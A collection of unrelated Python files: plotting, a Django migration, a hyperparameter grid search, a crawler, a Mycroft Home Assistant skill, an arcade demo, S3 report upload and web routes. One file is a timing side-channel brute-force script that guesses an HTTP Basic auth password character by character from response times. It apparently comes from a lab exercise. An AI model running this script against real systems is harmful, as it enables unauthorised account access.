#plt.subplot(121)
# <matplotlib.axes._subplots.AxesSubplot object at ...>
nx.draw(G, with_labels=True, font_weight='bold')
#plt.subplot(122)
# <matplotlib.axes._subplots.AxesSubplot object at ...>
#nx.draw_shell(G, with_labels=True, font_weight='bold')
# Show the drawing, then persist the graph as an adjacency list.
plt.show()
nx.write_adjlist(G,"graph.data")
|
import numpy as np
# Sample readings; report their spread and central tendency.
numbers = [100, 102, 98, 97, 103]
print(np.std(numbers))  # population standard deviation (ddof=0)
print(np.mean(numbers))
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.3 on 2017-02-25 17:04
from __future__ import unicode_literals
import django.db.models.deletion
from django.conf import settings
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated (Django 1.10.3): add CategoryBudgetGroup.owner and
    set related_name on the budgetapp foreign keys."""
    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('budgetapp', '0004_category_owner'),
    ]
    operations = [
        migrations.AddField(
            model_name='categorybudgetgroup',
            name='owner',
            field=models.ForeignKey(default=None, on_delete=django.db.models.deletion.CASCADE, related_name='category_budget_groups', to=settings.AUTH_USER_MODEL),
            preserve_default=False,
        ),
        migrations.AlterField(
            model_name='budgetgoal',
            name='budget',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='budget_goals', to='budgetapp.Budget'),
        ),
        migrations.AlterField(
            model_name='budgetgoal',
            name='long_term_goal',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='budget_goals', to='budgetapp.LongTermGoal'),
        ),
        migrations.AlterField(
            model_name='categorybudget',
            name='category',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='category_budgets', to='budgetapp.Category'),
        ),
        migrations.AlterField(
            model_name='categorybudget',
            name='group',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='category_budgets', to='budgetapp.CategoryBudgetGroup'),
        ),
        migrations.AlterField(
            model_name='categorybudgetgroup',
            name='budget',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='category_budget_groups', to='budgetapp.Budget'),
        ),
        migrations.AlterField(
            model_name='income',
            name='budget',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='incomes', to='budgetapp.Budget'),
        ),
        migrations.AlterField(
            model_name='longtermgoal',
            name='owner',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='long_term_goals', to=settings.AUTH_USER_MODEL),
        ),
        migrations.AlterField(
            model_name='transaction',
            name='category_budget',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='transactions', to='budgetapp.CategoryBudget'),
        ),
    ]
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from schedulers import Scheduler
from spaces import Categoric, Numeric
class GridSearcher(Scheduler):
    """Apply grid search for HPO.

    Enumerates the Cartesian product of all Categoric hyperparameters;
    Numeric hyperparameters stay at their defaults (from get_default()).
    """
    def __init__(self,
                 hyperparam_space,
                 early_stopper,
                 ensembler,
                 working_folder):
        super(GridSearcher, self).__init__(
            hyperparam_space, early_stopper, ensembler, working_folder)
        # grid search for categorical parameters while the numeric parameters are set as default value
        self.discrete_keys = []
        for key, value in self._hyperparam_space.items():
            if isinstance(value, Categoric) and len(value.categories) != 0:
                self.discrete_keys.append(key)
        # Fix: np.product is deprecated and removed in NumPy 2.0; np.prod
        # is the supported spelling with identical semantics.
        self.total_discrete_param = np.prod([len(self._hyperparam_space[key].categories)
                                             for key in self.discrete_keys])
        self.discrete_param_count = 0
        self._cur_config = self.get_default()

    def get_next_config(self):
        """Return the next grid configuration, or None when the grid has
        been exhausted."""
        self._early_stopper.reset()
        # Mixed-radix decode of the flat counter: one digit per
        # categorical key, base = number of categories for that key.
        param_index = self.discrete_param_count
        for key in self.discrete_keys:
            values = self._hyperparam_space[key].categories
            self._cur_config[key] = values[param_index % len(values)]
            param_index = int(param_index / len(values))
        self.discrete_param_count += 1
        return self._cur_config if self.discrete_param_count <= self.total_discrete_param else None
|
from threading import Thread
class Clock(Thread):
    """Thread that drives the CPU, running one tick per loop iteration."""

    def __init__(self, cpu, lock):
        # Fix: the original never called Thread.__init__, so start()
        # raised "thread.__init__() not called".
        super().__init__()
        self._cpu = cpu
        self._lock = lock

    def run(self):
        # NOTE(review): the lock is acquired once per tick and never
        # released here — presumably another thread releases it to pace
        # the clock; confirm against the lock's owner.
        while True:
            self._cpu.run_tick()
            self._lock.acquire()
#coding:utf-8
'''
author : linkin
e-mail : yooleak@outlook.com
date : 2018-11-15
'''
import time
from amipy.core.serverthread import SpiderServer
from amipy.core.spiderhub import SpiderHub
from amipy.core.loader import SpiderLoader
from amipy.core.crawler import WebCrawler
from amipy.core.looper import Looper
from amipy.core.scheduler import Scheduler
from amipy.middlewares import MiddleWareManager
from amipy.log import getLogger
from amipy.util.time import time_to_date
class WorkStation(object):
    """Top-level runtime of an amipy project: loads the spiders and wires
    the crawler, scheduler, looper and spider hub together, then drives
    the crawl loop."""
    def __init__(self,settings):
        self.settings = settings
        self.spider_loader = SpiderLoader(settings)
        self.spiders = self.spider_loader.load_all_spiders()
        self.crawler = WebCrawler(settings)
        self.scheduler = Scheduler(settings)
        self.looper = Looper()
        self.spider_hub = SpiderHub(settings,self.crawler)
        self.logger = getLogger(__name__)
        # self.data_processor = DataProcessor(settings)
    def _print_tips(self,got=True):
        """Print the project banner; with got=False print a how-to for
        creating a first spider and shut the station down."""
        print(f'* Amipy - project : {self.settings["project"].PROJECT_NAME}')
        if got:
            date = time_to_date(int(time.time()))
            print(f'* Running at {date}')
            print(f'* Spiders inside the project: {[i.name for i in self.spiders]}')
        else:
            print('* No spiders inside the project yet.Try to create one!')
            print('* You can create a spider by using commands like:\n')
            print('>> amipy cspider myspider\n')
            print('* Then you will see a directory named "myspider" ')
            print(f'* under the "spiders" folder of the project "{self.settings["project"].PROJECT_NAME}".')
            print('* What you need to do is "edit the spider.py" as you want.')
            self._close()
    def work(self,excludes=None,spider_names=None):
        """Run the crawl: select spiders (all, all-except *excludes*, or
        only *spider_names*), optionally start the spider server, then
        loop scheduling and crawling until interrupted."""
        self.logger.debug('Workstation running.')
        try:
            if excludes:
                spiders = [i for i in self.spiders if i.name not in excludes]
            elif spider_names:
                spiders = [i for i in self.spiders if i.name in spider_names]
                if not spiders:
                    print(f'* Amipy - project : {self.settings["project"].PROJECT_NAME}')
                    print(f'* No spider named "{spider_names}" inside the project.')
                    return
            else:
                spiders = self.spiders
            if not spiders:
                self._print_tips(False)
                return
            else:
                self._print_tips()
            [i.__build_model__() for i in spiders]
            print(f'* Current running spiders: {[i.name for i in spiders]}')
            self.mw_manager = MiddleWareManager(self.settings, spiders)
            if self.settings['project'].SPIDER_SERVER_ENABLE:
                self.server = SpiderServer(self.settings,spiders)
                self.server.start()
                self.logger.debug('SpiderServer started.')
            else:
                print('* Press Ctrl+C to stop the crawling.\n')
            self.spider_hub.takeover(spiders)
            self.spider_hub.start(self.looper)
            # Main loop: monitor the spiders, pull their new requests,
            # convert them to tasks and hand those to the event looper.
            while 1:
                self.scheduler.spiders_monitor(spiders)
                self.scheduler.receive(self.spider_hub.requests)
                tasks = self.crawler.convert(self.scheduler.export())
                self.looper.run_tasks(tasks)
        except (StopAsyncIteration,KeyboardInterrupt):
            self._close()
            self.logger.info('Amipy had been shut down.')
    def _close(self):
        """Close every spider that is still open."""
        for i in self.spiders:
            if not i.closed:
                i.close()
class Hero:
    """A hero with a name and hit points."""

    def __init__(self, name, starting_health=100):
        """Create a hero; with no damage taken yet, current health equals
        starting health."""
        self.name = name
        self.starting_health = starting_health
        self.current_health = starting_health

    def fight(self, opponent):
        """Remember who we are fighting and announce the fight."""
        self.opponent = opponent
        return "Fight!"
####
# NOTE(review): three separate __main__ guards run in sequence below —
# likely leftover lesson steps; confirm before consolidating.
if __name__ == "__main__":
    # If you run this file from the terminal
    # this block is executed.
    hero_2 = Hero("Wonder Woman", 200)
    print(hero_2.name)
    print(hero_2.current_health)
####
####
if __name__ == "__main__":
    # If you run this file from the terminal
    # this block is executed.
    hero_1 = Hero("Dumbledore", 200)
    print(hero_1.name)
    print(hero_1.current_health)
####
import random
# Announce a pseudo-random "winner" between the two demo heroes.
opponents = [
    "Wonder Woman", "Dumbledore"]
#print(f"All names:{opponents}/n")
idx = random.randint(0,len(opponents)-1)
print(f"{opponents[idx]} won! ")
if __name__ == "__main__":
    # If you run this file from the terminal
    # this block is executed.
    hero_1 = Hero("Wonder Woman")
    hero_2 = Hero("Dumbledore")
    hero_1.fight(hero_2)
#Ability Class
#__init__: Parameters: name: String, max_damage:Integer
#attack: No Parameters
#import random
class Ability:
    """An attack ability with a damage cap.

    Fix: attack() now returns its rolled damage instead of printing it,
    matching Armor.block() and Assault.strike() in this file, which both
    return their rolls.
    """
    def __init__(self, name, max_damage):
        self.name = name
        self.max_damage = max_damage

    def attack(self):
        """Return a random damage value in [0, max_damage)."""
        return random.randrange(0, self.max_damage)
#Armor Class
#__init__: Parameters: name: String, max_block: Integer
#block: Parameters: None
import random
class Armor:
    """A piece of armor that absorbs a random amount of damage."""

    def __init__(self, name, max_block):
        self.name = name
        self.max_block = max_block

    def block(self):
        """Return a random block value between 0 and max_block, inclusive."""
        return random.randint(0, self.max_block)
#Assault Class ... Just Because I Want To
#__init__: Parameters: name: String, max_block: Integer
#block: Parameters: None
class Assault:
    """An assault move that deals a random amount of strike damage."""

    def __init__(self, name, max_strike):
        self.name = name
        self.max_strike = max_strike

    def strike(self):
        """Return a random strike value between 0 and max_strike, inclusive."""
        return random.randint(0, self.max_strike)
#Hero Class
#__init__: Parameters: name:String, starting_health:Int (default value: 100)
#add_ability: Parameters: ability:Ability Object
#attack: No Parameters
#defend: incoming_damage: Integer
#take_damage: Parameters: damage
#is_alive: No Parameters
#fight: Parameters: opponent: Hero Class
|
from os.path import dirname, join
from adapt.intent import IntentBuilder
from mycroft.skills.core import MycroftSkill
from mycroft.util.log import getLogger
from os.path import dirname, join
from requests import get, post
from fuzzywuzzy import fuzz
import json
__author__ = 'robconnolly, btotharye'
LOGGER = getLogger(__name__)
class HomeAssistantClient(object):
    """Minimal REST client for a Home Assistant instance."""

    def __init__(self, host, password, portnum, ssl=False):
        self.ssl = ssl
        # Certificate-verification flag for the HTTPS calls below.
        # Fix: execute_service referenced self.verify, which was never
        # set anywhere (AttributeError on the SSL path); it is now set
        # explicitly, consistent with the verify=True used by the GETs.
        self.verify = True
        if self.ssl:
            self.url = "https://%s:%d" % (host, portnum)
        else:
            self.url = "http://%s:%d" % (host, portnum)
        self.headers = {
            'x-ha-access': password,
            'Content-Type': 'application/json'
        }

    def find_entity(self, entity, types):
        """Return the best fuzzy-name match for *entity* among states whose
        domain is in *types*, or None if nothing matches / request fails."""
        if self.ssl:
            req = get("%s/api/states" %
                      self.url, headers=self.headers, verify=self.verify)
        else:
            req = get("%s/api/states" % self.url, headers=self.headers)
        if req.status_code == 200:
            best_score = 0
            best_entity = None
            for state in req.json():
                try:
                    if state['entity_id'].split(".")[0] in types:
                        LOGGER.debug("Entity Data: %s" % state)
                        score = fuzz.ratio(
                            entity,
                            state['attributes']['friendly_name'].lower())
                        if score > best_score:
                            best_score = score
                            best_entity = {
                                "id": state['entity_id'],
                                "dev_name": state['attributes']
                                ['friendly_name'],
                                "state": state['state']}
                except KeyError:
                    # States without a friendly_name are skipped.
                    pass
            return best_entity

    #
    # checking the entity attributes to be used in the response dialog.
    #
    def find_entity_attr(self, entity):
        """Return (unit_of_measurement, friendly_name, state) for the exact
        *entity* id, or None when it is not found."""
        if self.ssl:
            req = get("%s/api/states" %
                      self.url, headers=self.headers, verify=self.verify)
        else:
            req = get("%s/api/states" % self.url, headers=self.headers)
        if req.status_code == 200:
            for attr in req.json():
                if attr['entity_id'] == entity:
                    entity_attrs = attr['attributes']
                    if attr['entity_id'].startswith('light.'):
                        # Lights report brightness instead of a unit.
                        unit_measur = entity_attrs['brightness']
                        sensor_name = entity_attrs['friendly_name']
                        sensor_state = attr['state']
                        return unit_measur, sensor_name, sensor_state
                    else:
                        try:
                            unit_measur = entity_attrs['unit_of_measurement']
                            sensor_name = entity_attrs['friendly_name']
                            sensor_state = attr['state']
                            return unit_measur, sensor_name, sensor_state
                        except BaseException:
                            # No unit available for this entity.
                            unit_measur = 'null'
                            sensor_name = entity_attrs['friendly_name']
                            sensor_state = attr['state']
                            return unit_measur, sensor_name, sensor_state
        return None

    def execute_service(self, domain, service, data):
        """POST *data* to the /api/services/<domain>/<service> endpoint."""
        if self.ssl:
            post("%s/api/services/%s/%s" % (self.url, domain, service),
                 headers=self.headers, data=json.dumps(data),
                 verify=self.verify)
        else:
            post("%s/api/services/%s/%s" % (self.url, domain, service),
                 headers=self.headers, data=json.dumps(data))
# TODO - Localization
class HomeAssistantSkill2(MycroftSkill):
    """Mycroft skill that triggers fixed Home Assistant scenes/scripts for
    a set of keyword intents (movie time, bed time, Spotify and volume
    control, going out)."""
    def __init__(self):
        super(HomeAssistantSkill2, self).__init__(name="HomeAssistantSkill2")
        # Connection details come from this skill's configuration block.
        self.ha = HomeAssistantClient(self.config.get('host'),
            self.config.get('password'), self.config.get('portnum') ,ssl=self.config.get('ssl', False))
    def initialize(self):
        """Register one keyword intent per handler defined below."""
        movietime_intent = IntentBuilder("MovieTimeIntent").require("MovieTimeKeyword").build()
        self.register_intent(movietime_intent, self.handle_movietime_intent)
        bedtime_intent = IntentBuilder("BedTimeIntent").require("BedTimeKeyword").build()
        self.register_intent(bedtime_intent, self.handle_bedtime_intent)
        todo_list_intent = IntentBuilder("TodoListIntent").require("TodoListKeyword").build()
        self.register_intent(todo_list_intent, self.handle_todo_list_intent)
        movie_list_intent = IntentBuilder("MovieListIntent").require("MovieListKeyword").build()
        self.register_intent(movie_list_intent, self.handle_movie_list_intent)
        ## add to home assistant
        stop_spotify_intent = IntentBuilder("StopSpotifyIntent").require("StopSpotifyKeyword").build()
        self.register_intent(stop_spotify_intent, self.handle_stop_spotify_intent)
        next_song_intent = IntentBuilder("NextSongIntent").require("NextSongKeyword").build()
        self.register_intent(next_song_intent, self.handle_next_song_intent)
        volume_high_intent = IntentBuilder("VolumeHighIntent").require("VolumeHighKeyword").build()
        self.register_intent(volume_high_intent, self.handle_volume_high_intent)
        volume_mid_intent = IntentBuilder("VolumeMidIntent").require("VolumeMidKeyword").build()
        self.register_intent(volume_mid_intent, self.handle_volume_mid_intent)
        volume_low_intent = IntentBuilder("VolumeLowIntent").require("VolumeLowKeyword").build()
        self.register_intent(volume_low_intent, self.handle_volume_low_intent)
        going_out_intent = IntentBuilder("GoingOutIntent").require("GoingOutKeyword").build()
        self.register_intent(going_out_intent, self.handle_going_out_intent)
    # Each handler below resolves a fixed scene by fuzzy name and turns it
    # on through the homeassistant.turn_on service.
    def handle_movietime_intent(self, message):
        entity = 'movie_time'
        LOGGER.debug("Entity: %s" % entity)
        ha_entity = self.ha.find_entity(entity, ['scene'])
        ha_data = {'entity_id': ha_entity['id']}
        self.speak('enjoy the show')
        self.ha.execute_service("homeassistant", "turn_on", ha_data)
    def handle_bedtime_intent(self, message):
        entity = 'bed_time'
        LOGGER.debug("Entity: %s" % entity)
        ha_entity = self.ha.find_entity(entity, ['scene'])
        ha_data = {'entity_id': ha_entity['id']}
        self.speak('have a good sleep')
        self.ha.execute_service("homeassistant", "turn_on", ha_data)
    def handle_todo_list_intent(self, message):
        entity = 'to_do_list'
        LOGGER.debug("Entity: %s" % entity)
        ha_entity = self.ha.find_entity(entity, ['scene'])
        # NOTE(review): this speaks 'have a good sleep' — looks copy-pasted
        # from the bedtime handler; confirm the intended prompt.
        self.speak('have a good sleep')
        ha_data = {'entity_id': ha_entity['id']}
        self.ha.execute_service("homeassistant", "turn_on", ha_data)
    def handle_movie_list_intent(self, message):
        entity = 'movie_watch_script'
        LOGGER.debug("Entity: %s" % entity)
        ha_entity = self.ha.find_entity(entity, ['scene'])
        ha_data = {'entity_id': ha_entity['id']}
        self.ha.execute_service("homeassistant", "turn_on", ha_data)
    ### add to home assistant
    def handle_stop_spotify_intent(self, message):
        entity = 'stop_spotify'
        LOGGER.debug("Entity: %s" % entity)
        ha_entity = self.ha.find_entity(entity, ['scene'])
        ha_data = {'entity_id': ha_entity['id']}
        self.ha.execute_service("homeassistant", "turn_on", ha_data)
    def handle_next_song_intent(self, message):
        entity = 'next_song'
        LOGGER.debug("Entity: %s" % entity)
        ha_entity = self.ha.find_entity(entity, ['scene'])
        ha_data = {'entity_id': ha_entity['id']}
        self.ha.execute_service("homeassistant", "turn_on", ha_data)
    def handle_volume_high_intent(self, message):
        entity = 'volume_high'
        LOGGER.debug("Entity: %s" % entity)
        ha_entity = self.ha.find_entity(entity, ['scene'])
        ha_data = {'entity_id': ha_entity['id']}
        self.ha.execute_service("homeassistant", "turn_on", ha_data)
    def handle_volume_mid_intent(self, message):
        entity = 'volume_medium'
        LOGGER.debug("Entity: %s" % entity)
        ha_entity = self.ha.find_entity(entity, ['scene'])
        ha_data = {'entity_id': ha_entity['id']}
        self.ha.execute_service("homeassistant", "turn_on", ha_data)
    def handle_volume_low_intent(self, message):
        entity = 'volume_low'
        LOGGER.debug("Entity: %s" % entity)
        ha_entity = self.ha.find_entity(entity, ['scene'])
        ha_data = {'entity_id': ha_entity['id']}
        self.ha.execute_service("homeassistant", "turn_on", ha_data)
    def handle_going_out_intent(self, message):
        entity = 'going_out'
        LOGGER.debug("Entity: %s" % entity)
        ha_entity = self.ha.find_entity(entity, ['scene'])
        ha_data = {'entity_id': ha_entity['id']}
        self.ha.execute_service("homeassistant", "turn_on", ha_data)
        self.speak('see you when you get back')
    def stop(self):
        pass
def create_skill():
    """Entry point used by the Mycroft skill loader."""
    return HomeAssistantSkill2()
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Jan 10 17:08:35 2020
@author: minjie
"""
# NOTE(review): the lines below use the IPython `%run` magic — this file is a
# training-session log, not importable Python. Each line trains one network
# variant on ISIC 2018 Task 3 data; later lines add 5-fold CV (--K_fold 5)
# and more data-loader workers (--num_workers 8).
%run train_ISIC_gllcmeta.py --datasets ../data/ISIC18/task3/ISIC2018_Task3_Training_Input_coloradj --net resnet50_singleview --out_dir ../checkpoints/resnet50_singleview_fast --num_epochs 50 --lr 0.005
%run train_ISIC_gllcmeta.py --datasets ../data/ISIC18/task3/ISIC2018_Task3_Training_Input_coloradj --net resnet50_twoview --out_dir ../checkpoints/resnet50_twoview_fast --num_epochs 50 --lr 0.005
%run train_ISIC_gllcmeta.py --datasets ../data/ISIC18/task3/ISIC2018_Task3_Training_Input_coloradj --net resnet50_meta --out_dir ../checkpoints/resnet50_meta_fast --num_epochs 50 --lr 0.005
%run train_ISIC_gllcmeta.py --datasets ../data/ISIC18/task3/ISIC2018_Task3_Training_Input_coloradj --net resnet50_singleview --out_dir ../checkpoints/resnet50_singleview_fast_k5 --num_epochs 50 --lr 0.005 --K_fold 5
%run train_ISIC_gllcmeta.py --datasets ../data/ISIC18/task3/ISIC2018_Task3_Training_Input_coloradj --net resnet50_twoview --out_dir ../checkpoints/resnet50_twoview_fast_k5 --num_epochs 50 --lr 0.005 --K_fold 5
%run train_ISIC_gllcmeta.py --datasets ../data/ISIC18/task3/ISIC2018_Task3_Training_Input_coloradj --net resnet50_metatwoview --out_dir ../checkpoints/resnet50_metatwoview_fast_k5 --num_epochs 30 --lr 0.005 --K_fold 5 --num_workers 8
%run train_ISIC_gllcmeta.py --datasets ../data/ISIC18/task3/ISIC2018_Task3_Training_Input_coloradj --net resnet50_singleview --out_dir ../checkpoints/resnet50_singleview_fast_k5 --num_epochs 30 --lr 0.005 --K_fold 5 --num_workers 8
%run train_ISIC_gllcmeta.py --datasets ../data/ISIC18/task3/ISIC2018_Task3_Training_Input_coloradj --net resnet50_metasingleview --out_dir ../checkpoints/resnet50_metasingleview_fast_k5 --num_epochs 30 --lr 0.005 --K_fold 5 --num_workers 8
%run train_ISIC_gllcmeta.py --datasets ../data/ISIC18/task3/ISIC2018_Task3_Training_Input_coloradj --net effnetb4_singleview --out_dir ../checkpoints/effnetb4_singleview_fast_k5 --num_epochs 30 --lr 0.005 --K_fold 5 --num_workers 8
%run train_ISIC_gllcmeta.py --datasets ../data/ISIC18/task3/ISIC2018_Task3_Training_Input_coloradj --net effnetb4_metasingleview --out_dir ../checkpoints/effnetb4_metasingleview_fast_k5 --num_epochs 30 --lr 0.005 --K_fold 5 --num_workers 8
|
#!/usr/bin/env python3
import utils, open_color, arcade # importing the libraries necessary to run the program
utils.check_version((3,7))
SCREEN_WIDTH = 800  # window width in pixels
SCREEN_HEIGHT = 600  # window height in pixels
SCREEN_TITLE = "Smiley Face Example"  # text shown in the window title bar
class Faces(arcade.Window):
    """A window that draws a smiley face anchored to the mouse cursor."""

    def __init__(self):
        """Create the window, show the cursor, start the face centered."""
        super().__init__(SCREEN_WIDTH, SCREEN_HEIGHT, SCREEN_TITLE)
        self.set_mouse_visible(True)
        # Face position starts at the screen center, then follows the mouse.
        self.x = SCREEN_WIDTH / 2
        self.y = SCREEN_HEIGHT / 2
        arcade.set_background_color(open_color.white)

    def on_draw(self):
        """Render the face at the current cursor position."""
        arcade.start_render()
        cx, cy = self.x, self.y
        # Yellow head with a black outline.
        arcade.draw_circle_filled(cx, cy, 100, open_color.yellow_3)
        arcade.draw_circle_outline(cx, cy, 100, open_color.black, 4)
        # Eyes (black ellipses), each with a small grey light catch.
        arcade.draw_ellipse_filled(cx - 30, cy + 20, 15, 25, open_color.black)
        arcade.draw_ellipse_filled(cx + 30, cy + 20, 15, 25, open_color.black)
        arcade.draw_circle_filled(cx - 25, cy + 25, 3, open_color.gray_2)
        arcade.draw_circle_filled(cx + 35, cy + 25, 3, open_color.gray_2)
        # Smile: an arc slightly below the face center.
        arcade.draw_arc_outline(cx, cy - 10, 60, 50, open_color.black, 190, 350, 4)

    def on_mouse_motion(self, x, y, dx, dy):
        """Track the mouse so the face follows the cursor."""
        self.x = x
        self.y = y
window = Faces()  # instantiate the game window
arcade.run()  # enter the arcade event loop (blocks until the window closes)
from matplotlib import pyplot as plt
from matplotlib.patches import Ellipse
from scipy.stats import chi2
import numpy as np
def results(stream, result, config):
    """Result-reporting hook; intentionally a no-op in this module."""
    pass
def display_err(err):
    """Plot the error history, skipping the first (warm-up) entry."""
    plt.plot(err[1:])
    plt.show()
def eigsorted(cov):
    """Eigendecompose symmetric `cov`; return (values, vectors) sorted
    by descending eigenvalue, vectors as matching columns."""
    values, vectors = np.linalg.eigh(cov)
    descending = np.argsort(values)[::-1]
    return values[descending], vectors[:, descending]
def display_result(mu, cov, instances):
    """Scatter the 2-D instances and overlay one covariance ellipse per component.

    mu: sequence of component means; cov: matching covariance matrices;
    instances: iterable of 2-D points. Returns silently for non-2-D models.
    """
    if np.shape(mu[0]) != (2,):
        return  # only 2-D models can be drawn
    plt.plot()
    plt.title('model')
    coords = list(zip(*instances))
    plt.scatter(x=coords[0], y=coords[1])
    ax = plt.gca()  # original had a dead `ax = None; if ax is None:` dance
    for mean, covariance in zip(mu, cov):
        vals, vecs = eigsorted(covariance)
        # Angle of the principal eigenvector, in degrees.
        theta = np.degrees(np.arctan2(*vecs[:, 0][::-1]))
        # 50% confidence region: chi-square quantile scales the eigenvalues.
        width, height = 2 * np.sqrt(chi2.ppf(0.5, 2)) * np.sqrt(vals)
        ax.add_artist(Ellipse(xy=mean, width=width, height=height,
                              angle=theta, alpha=0.5, color='red'))
    plt.show()
def plot(config, alg, stream):
    """Dispatch plotting by config flags: plot_2d draws the fitted model over
    the data; plot_err plots the training error history."""
    if config.plot_2d:
        display_result(alg.means, alg.covars, stream[:])
    if config.plot_err:
        display_err(alg.hist)
|
# Minimum number of "flip a run" operations to make a 0/1 string uniform:
# count the runs of 1s and the runs of 0s, answer is the smaller count.
digits = [int(ch) for ch in input()]
to_all_zero = 0  # flips needed to turn every digit into 0
to_all_one = 0   # flips needed to turn every digit into 1
if digits[0] == 1:
    to_all_zero += 1
else:
    to_all_one += 1
for prev, cur in zip(digits, digits[1:]):
    if prev != cur:
        if cur == 1:
            to_all_zero += 1
        else:
            to_all_one += 1
print(min(to_all_zero, to_all_one))
# -*- encoding: utf-8 -*-
#from .utils import *
from .CallerClasses import *
from .InteractionMatrix import *
from .DataClasses import *
from .ExperimentClass import *
from .DataGeneration import *
from .logger import *
# Package metadata exposed to consumers.
__version__ = "0.0.2"
__author__ = 'Aleksandra Galitsyna and Dmitry Mylarcshikov'
__email__ = 'agalitzina@gmail.com'
import pandas as pd
import base64
import os
import pdfkit
import boto3
import datetime
from configparser import ConfigParser
configure = ConfigParser()
# AWS credentials come from a local secret.ini file; NOTE(review): if the
# file or [AWS] section is missing, configure.get raises at import time.
configure.read("secret.ini")
ACCESS_KEY = configure.get("AWS", "ACCESS_KEY")
SECRET_KEY = configure.get("AWS", "SECRET_KEY")
BUCKET = configure.get("AWS", "BUCKET")  # target S3 bucket name
def store_file_as_pdf(get_latest_ca):
    """Render today's report data to a PDF and upload it.

    Returns (upload_result, filename).
    """
    today = datetime.datetime.now().strftime("%d-%b-%Y")
    report_name = f"Daily Report ( {today} ).pdf"
    uploaded = store_file(report_name, get_latest_ca, 'pdf')
    return uploaded, report_name
def store_file(filename, data, typ="pdf"):
    """Render tabular `data` to an HTML table, convert it to a PDF, upload it.

    Returns upload_to_aws()'s True/False for typ == 'pdf'; None otherwise
    (matching the original implicit behavior for other types).
    """
    if typ != 'pdf':
        return None
    df = pd.DataFrame(data=data).fillna('-')
    html_file_path = os.path.join("Daily Report.html")
    pdf_file_path = os.path.join(filename)
    # `with` guarantees the handle closes even if to_html() raises
    # (the original used open/close and leaked the handle on error).
    with open(html_file_path, 'w') as fd:
        fd.write(df.to_html())
    pdfkit.from_file(html_file_path, pdf_file_path)
    return upload_to_aws(filename, filename)
def upload_to_aws(local_file, s3_file):
    """Upload `local_file` to the configured bucket under key `s3_file`.

    Returns True on success, False when the local file is missing or
    AWS credentials are unavailable.
    """
    # The original referenced NoCredentialsError without importing it, so a
    # credentials failure raised NameError instead of being handled.
    # botocore ships with the already-used boto3 dependency.
    from botocore.exceptions import NoCredentialsError

    s3 = boto3.client('s3', aws_access_key_id=ACCESS_KEY,
                      aws_secret_access_key=SECRET_KEY)
    try:
        s3.upload_file(local_file, BUCKET, s3_file)
        print("Upload Successful")
        return True
    except FileNotFoundError:
        print("The file was not found")
        return False
    except NoCredentialsError:
        print("Credentials not available")
        return False
|
#from google.appengine.ext import webapp
#[START imports]
import webapp2
from google.appengine.ext.webapp import template
from google.appengine.ext.webapp.util import run_wsgi_app
from google.appengine.api import users
from modelHandlers import departmentHandler, studentHandler
from modelHandlers import courseHandler, scheduleHandler, enrollmentsHandler
from google.appengine.ext.key_range import ndb
#[END imports]
class MainPage(webapp2.RequestHandler):
    """Handler for '/': renders the main template for a signed-in user."""

    def get(self):
        """Render main.html plus a greeting; do nothing when signed out."""
        user = users.get_current_user()
        if not user:
            return
        self.response.out.write(template.render('main.html', {}))
        self.response.out.write('Hello, ' + user.nickname())

    def post(self):
        """Acknowledge POST requests."""
        self.response.out.write('posted!')
''' Using toplevel makes sure that all asynchronous put requests have been handled before handler exits'''
# URL routing table: each path maps to its model handler class.
application = ndb.toplevel(webapp2.WSGIApplication([
    webapp2.Route(r'/', handler=MainPage, name='Main'),
    webapp2.Route(r'/department', handler=departmentHandler, name='department'),
    webapp2.Route(r'/course', handler=courseHandler, name='course'),
    webapp2.Route(r'/student', handler=studentHandler, name='student'),
    webapp2.Route(r'/schedule', handler=scheduleHandler, name='schedule' ),
    webapp2.Route(r'/enrollments', handler=enrollmentsHandler, name='enrollments')
    ], debug=True))
def main():
    """CGI entry point: serve the routed WSGI application."""
    run_wsgi_app(application)
if __name__ == "__main__":
    main()
|
import requests
import time
from time import sleep
# Timing side-channel brute force against HTTP Basic auth: for each candidate
# next character, time the server's response; the slowest response is taken
# to mean the guessed prefix matched one character deeper.
higher = 0            # slowest response time observed so far
letraTemporal = ''    # best-timing candidate for the next password character
password = "p4ssw0r"  # known password prefix to extend
ip = '192.168.0.29'
status_code = 401
while status_code != 200:
    # 0..126 covers all ASCII code points, including control characters.
    for letra in range(127):
        start = time.time()
        r = requests.get('http://'+ip+'/authentication/example2/', auth=('hacker', str(password+chr(letra))))
        reqtime = time.time() - start
        print(password+chr(letra), "=", reqtime, r.status_code)
        if reqtime > higher:
            higher = reqtime
            letraTemporal = chr(letra)
        if r.status_code == 200:
            status_code = 200
            break
    # NOTE(review): `higher`/`letraTemporal` are never reset between
    # positions, and on a 200 the appended char is the best-timing one, not
    # necessarily the char that succeeded — TODO confirm final output.
    password+=letraTemporal
    print('Temporal = ' + password)
print('Final = ' + password)
|
#-*- coding:utf-8 -*-
from flask import Flask ,request, g, render_template, url_for, redirect, abort
from manage import blue_print
import config
import json
from account.lib.user_lib import auth_user
from dns.lib.user_domain_lib import get_domain_list_by_user_id
from dns.lib.domain_lib import get_all_domain_dict_lib, if_user_id_have_domain_rights
from dns.model.domain import Domain
@blue_print.route("/domain_list", methods=["GET","POST"])
def domain_list():
    """List every domain plus the ones the signed-in user may manage."""
    auth_result = auth_user()
    if not auth_result[0]:
        # Not authenticated: auth_result[1] holds the login redirect target.
        return redirect(auth_result[1])
    userinfo = auth_result[1]
    user_domain_list = get_domain_list_by_user_id(userinfo['user_id'])
    all_domain_list = get_all_domain_dict_lib()
    return render_template("manage_domain_list.html", userinfo=userinfo,
                           user_domain_list=user_domain_list,
                           all_domain_list=all_domain_list)
@blue_print.route("/domain", methods=["GET","POST"])
def domain():
    """Show one domain, choosing the template by the user's edit rights."""
